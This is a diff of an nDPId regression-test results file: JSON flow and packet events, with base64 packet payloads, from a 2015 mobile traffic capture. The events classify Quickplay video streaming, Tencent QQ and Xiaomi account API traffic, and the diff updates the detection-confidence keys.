+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 01052{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1429000054688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000054688,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjvEAAPwaG4wo2qfp4HCMoyykAUHABs6PLUc5cUBgk\/ZRuAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} 00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1429000054967,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000054967,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUEEkAArQbHccvNgWUKNqn6AFCnCorJCJ8MOwSFUBgII8UCAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDvBAYGAAAXudj2eCNNjv4Uv\/n42\/lx"} 00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1429000055158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000055158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYkAArAas5svNl6AKNqn6AFDWZdcfCppPknoiUBkIIrzXAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} -01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1429000052217,"flow_last_seen":1429000090450,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":19212,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1429000090450,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7580000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1429000110390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":681,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":681,"pkt_l4_len":645,"thread_ts_msec":1429000110390,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAApm620AAPwZqrgo2qfrLzZPXi1YAUBkYU+pems3wUBgAbqLPAABQT1NUIGh0dHA6Ly9oa21pbm9yc2hvcnQud2VpeGluLnFxLmNvbS9jZ2ktYmluL21pY3JvbXNnLWJpbi9ydGt2cmVwb3J0IEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMzU1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGttaW5vcnNob3J0LndlaXhpbi5xcS5jb20NClVzZXItQWdlbnQ6IE1pY3JvTWVzc2VuZ2VyIENsaWVudA0KDQqNXyYBAEFVK9B93wIQAhdIZGw+bAzfhIMAzAXaBLgCxN0BAsPj4k0n0ICdjYK52ViOWnOC4Vzgxi7+iegOsMW+oW6QdEAHg+UlyxaSBb9\/s0oeR4gum6gk+uWhqjv3Tkoz3jpOxZ3uqg5IoeAevVK78mE+75Mm5QEXaL\/24wa8I4nsiJTVEr54yg9WsIjA1I\/cd65YM57jS4+t1kJ\/xpqwwPsMfqK2G34N85Xo0uWP1F2PyLEjHiJZyK4xRu\/XYVzahdDn1vQRPtqQ3i2o6ggKNGN3kBkFa6C2GO0zTqwt7XUYqb0ppGq3KKIyPCtrTg5YICuEsfTDMTLer3J067M5VD93Ij+RkxqqGFN9+gvu+C\/smM0OksnEYsvtVnkr65ZF5Pk4qVPYHRDIlRcRHe0XzckIkJitYHFr8VSN2R6GxFfZK0YtMPQdmLxH6qLecheL3Cuuz7XcYpBc6JGpDIih+q4v"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7580000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7580000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1429000110528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":262,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":262,"pkt_l4_len":226,"thread_ts_msec":1429000110528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPYrhEAArQaNjMvNk9cKNqn6AFCLVl6azfAZGFZbUBgIKKjyAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ4DQoNCoJfAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDMBQYGAIBAF7nY9ngjTY7+FL\/5+Nv5cQ=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7580000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1429000117728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":638,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":638,"pkt_l4_len":602,"thread_ts_msec":1429000117728,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAm69YkAAPwYFAwo2qfo2s4xB3D0AUJYYUVzgorreUBgAc7mmAABHRVQgL3Bhc3MvdjIvc2FmZS91c2VyL2NvcmVJbmZvP3NpZ25hdHVyZT11JTJGNzNkRVhCSGJlamV2MElTTnduR3l5ZmVUdyUzRCZ1c2VySWQ9TXo1WHI1VVhLdXc4M2h4ZDZZbXMydyUzRCUzRCBIVFRQLzEuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvb2tpZTogY1VzZXJJZD1SbmVTNDhuLWRZX1ZlMllKU3NWLXF0RUxvOG87IHNlcnZpY2VUb2tlbj1qYWl5azdjUlQ0WDI0RWp3eENnQUxHOEFJdk9pWmNWTFU1cCsyaW9HSzVaK1MrWDFLbkJwOHBGUDJIV3FhVFJEWHU1eUY3YjZqaDdYdDQxZTZZOXYyUVRGN2tnbUhrSjBhSXJ0Sm9iOTBaZ2lBMy8rYlZQWXBrcVM3ajhUREorNEo3Rkt3VzFsZDZCWSswakU4SncxbGYrTVE0OEVUQmlOc01FbEthUGh2MEREOVZvUlMxNXRVM2dSMHlmVEcxWHMNClVzZXItQWdlbnQ6IERhbHZpay8xLjYuMCAoTGludXg7IFU7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIE1JVUkvVjYuNC4yLjAuS1hETUlDQikNCkhvc3Q6IGFwaS5hY2NvdW50LnhpYW9taS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7580000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.account.xiaomi.com","url":"api.account.xiaomi.com\/pass\/v2\/safe\/user\/coreInfo?signature=u%2F73dEXBHbejev0ISNwnGyyfeTw%3D&userId=Mz5Xr5UXKuw83hxd6Yms2w%3D%3D","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7580000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.account.xiaomi.com","url":"api.account.xiaomi.com\/pass\/v2\/safe\/user\/coreInfo?signature=u%2F73dEXBHbejev0ISNwnGyyfeTw%3D&userId=Mz5Xr5UXKuw83hxd6Yms2w%3D%3D","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 01505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1429000118045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":831,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":831,"pkt_l4_len":795,"thread_ts_msec":1429000118045,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAy+57kAArQaZmTazjEEKNqn6AFDcPeCiut6WGFOiUBgIJVI5AABIVFRQLzEuMSAyMDAgT0sNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQpEYXRlOiBUdWUsIDE0IEFwciAyMDE1IDA4OjI4OjM3IEdNVA0KU2VydmVyOiBUZW5naW5lLzIuMC4xDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD11dGYtOA0KQ29udGVudC1MZW5ndGg6IDU1Ng0KDQofiwgAAAAAAAADBMHXokMwAADQD+pDVCuuR7VCzdrerESNxijK199zgLVnYggNE5ULioIZGP6CKSQ+J1Ue9LQPP\/PeL9xYw3Gkgs8aCeFd\/zZqCdqbSs4SDagv3Q8gbXJOLHNZZfmdTsJ6vPDYpe+\/rdailf+Vy4WCt5JCSfPLvLm\/VjBPjj45GMX6eUks60t+xxt21vhZm+cZaqa7DoZ7yob2ejBdIHAVjR1TTdJhFubG5KBya8nY0zzMWLsuzvCvt9glIynGQHg+BLRZzPC8ZTGPUyOvUh05tiZ\/balrrwKQt2cEeJstEBP0D5BLZnKvY160w+\/OrxB+sjFauMt5dnHUcI3t7SoTqChgxCrhMkNhG6YVl2LK8pgjuYhqcDRox+KgQzOA\/hLmGzg3uirtssbFIVC5Aro3ACcGCwISGwb1VxWHonPvyWHNDlG81Bqq3QQetunNZnl6oz4rq\/ZHNPTVG61wMgLdvvo4GWhjgZ\/bnblrSFNGd7Mdr5MexXVx6SfeJVyvwBelPETxWHKKoRDa8ZjUvT0cEJOB7G\/G7e4ZZ\/83OAc7CIIAAEA\/iIulwzriBqhJkUE6bpVlTg1QY+rX1\/uCF5JNOyMtykH7DdhqEwaXY8s7mPz38wS8mngvjnR+4AS+bZOCqFuqMeaMn6SzJIMOPFhSp7GcsxUbtqiwMa7\/yvtnpf2t24H4WaAC+sVExSgCQaWyVTSeVY6vezz8ABeIl3WAAgAA"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1429000153937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000153937,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeag6kAAPwZJswo2qfp4HCMoyzEAUC00WpDdwOXGUBgBycCpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0048.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0048.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 02356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1429000156273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000156273,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaB3UUAArQYBdngcIygKNqn6AFDLMd3LpTQtNFxOUBAIItXfAAChEIrgrleYAhFa3F3938BggSrcIn+nqVX5sByKXTUtTZ+S0IwO\/hIwf0BB2uc3Bf5jC1QfzUHjRvDUIOnnsb5a0uxxhiIVAqWnEYC45w18yjCMLPuOKVZeOYgfCQVjYsxLAKkdXaRkmMu4Zoel0HztrVYR1cnta\/vSYGQ0WkMhgl3KFYUm\/X4qjjWEdowcfDAWr\/FWJBR4jsXSxR8EQOd7RYpfWOl0YqAXrcURgivoA\/Vazm9dSSQ6DzW0D1TNTghMrqCseZaLLp2diY5etWqcT5Lxxdnl2ino6PEahKmf04RjOZq83lwn5PEPti9QeNcfMNctSiHj28O5VeDtauVKLipzStAYJu6O1tMaMLByrHeLYYc5MbsLRR9vao6KZRnJE1AEzpmLa\/+YrNJZcLrW3joqQ2AvZzJNsHv1pr7090xMkT87olqCX5Yd5dgxMvv2CbBfzbv7iN0239xxLePmefbZXxmf1ljpyZUWt+YUi19f0cGaafC5roKKnRsDLjalFhQzNZMDN1+qROgcpPpFrfcPRzSCRX2oM3IXqFNyhnIqEBeoqjt\/rN0OghieSXA+J4\/fnibDY2oBF\/qPi7PmT7+EZQfp4dOU7LXGxwfkHyb\/+nSUhuDDHBPkRtLg+XO3xXfDG63CCzgP9j+ew7ylJL7s8zjEAnk0iP7KsAXK1fFcvUkB5LITD3qa1hjsRXNIyWIaxMkwR8GhlPLtf0hpPiS0Um8a1yduUSn4xM5n3AHwQrDyknL7fxErOcmIBqXcP2oyyyTV+m9b64iHrtRxBINGeYaff6lhmqnRqCvGC1F52Og\/seNDfW8RWv4yBXzQwblMI7xviVAgMjEyKmjtOXwyzWj0J+YuHjA3wXbbyRFf\/zujxfqXq0HOg5HobG69sZOgCtlNOxGxs6uNG3Nyl1bm6YuhORfGFVH4dDhxB4pM4mawqKQgNd3ZivrDKzWiLphhw89pFSEPmrYR+dSw4\/6dNuOLRnG16Am5LUzsom4k95ky9x\/PVPzeU+5ie6mhYpgOrbjeFpz+rg+m9C+NB8SEBd6muVe4B37GCYUkUck7iEmhbPSKsrUqKYVveBJ0WJIstk9mKFzxlfKH3J2\/bjYqxEQYbmgG6oJ5ralnDKawN31PTuvOshsQceM7W53\/H7rfpivL6lr\/kjGpOhEd9Dxxlf9p+4v7nxfQAiorCo+Ipnx1Vx4\/M8DFoeolmxcpnpC1\/t87cEimWGKlQKNWBmqgBX3lF+jG0RumppZSWz\/aQfU6VQwCojXD7XsZoKlt0fqkAcQPgNbx4gtOwebSddbvGBn7uPBEFCe1qtOY1P6e8nyGK8y1LANkR3tsNsXJFvHkj5HBf+Fth6gbnan75B2fOeWrkdUU90lajYKwLL1LL5gxqWv1nPgRm5gG0V\/LUY3dCEIra5BI+d3CAtAPKtdluT\/JXWML4j3eAT74+s9ouu5yox25rXWvrCvhcuf5BYDjdzBBmrYB\/t4fb52bttXAQuL80qQnY5Oj1X5f+Um3rpgjwFtGj7n30bbQASEZTdFPUOe8kJs7mBkrIY6yotsjZG+hKNfMJZdhU8ZShuzC8djNjp9NuCLli+\/ugxOOk4+twmaL+UUbEqGDcxcAEBa5EyOAV7RfqezgWcaQ3dbJjWXdNWxetLCdQ7XanJt3eAkt933KoymlC4XmU95LAhWF33+FFwL3BYas4y5X8wDDUnULI8QtkzKEN2oLGgIewtkuDrW4wpL3EZsIKv86JV8UzFxUMaP2MiczrH7WqOOsj1ytSR\/mRWDeXJftrtXq0qR46GntPeDZXJQKpY9CB2cQr+2LnDbM8iBOGE8HrF8a0W0JfepPoC6ozHQ5CxM0HE7L3V4aaQ=="} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1429000156459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000156459,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaip0AAPwZH9go2qfp4HCMoyzEAUC00XE7dy64AUBhgH5dQAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 